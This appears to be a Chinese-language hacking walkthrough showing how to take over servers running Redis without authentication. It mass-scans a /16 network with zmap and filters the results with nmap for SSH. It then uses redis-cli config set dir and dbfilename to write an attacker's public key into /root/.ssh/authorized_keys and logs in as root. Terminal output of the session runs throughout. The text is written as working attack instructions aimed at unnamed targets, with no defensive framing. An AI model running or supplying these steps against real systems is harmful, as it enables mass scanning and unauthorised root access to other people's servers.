先上 zmap 这个大杀器大范围找安装 redis 服务的机器，aaa.bbb.0.0 是计划扫描的网络。

$ zmap -B 1M -p 6379 aaa.bbb.0.0/16 -o results.csv

然后根据 results.csv 的结果来逐个排查，注意要能 ssh 登录的。

$ cat results.csv | xargs nmap -p 22

最后找一个隐蔽环境，开始干活，aaa.bbb.ccc.ddd 是目标地址：

root@ab871b39330f:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
f8:d1:b2:bc:d9:13:13:3d:de:6d:6e:27:bf:28:28:72 root@ab871b39330f
The key's randomart image is:
+---[RSA 2048]----+
|                 |
|                 |
|           .     |
|       . .. o    |
|      . S .o o . |
|       o +o . . o|
|        + .o   o |
|     . E =..  o +|
|      o + .... =+|
+-----------------+
root@ab871b39330f:~# (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") | redis-cli -h aaa.bbb.ccc.ddd -x set crackit
OK
root@ab871b39330f:~# redis-cli -h aaa.bbb.ccc.ddd
aaa.bbb.ccc.ddd:6379> config set dir /root/.ssh/
OK
aaa.bbb.ccc.ddd:6379> config get dir
1) "dir"
2) "/root/.ssh"
aaa.bbb.ccc.ddd:6379> config set dbfilename "authorized_keys"
OK
aaa.bbb.ccc.ddd:6379> save
OK
aaa.bbb.ccc.ddd:6379> exit
root@ab871b39330f:~# ssh root@aaa.bbb.ccc.ddd
The authenticity of host 'aaa.bbb.ccc.ddd (aaa.bbb.ccc.ddd)' can't be established.
RSA key fingerprint is 0c:9d:60:e6:24:51:07:4d:93:0f:f3:4e:cb:12:ae:43.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'aaa.bbb.ccc.ddd' (RSA) to the list of known hosts.
Last login: Tue Sep 29 15:20:10 2015 from 202.115.16.136
[root@mscopyright1 ~]# pwd
/root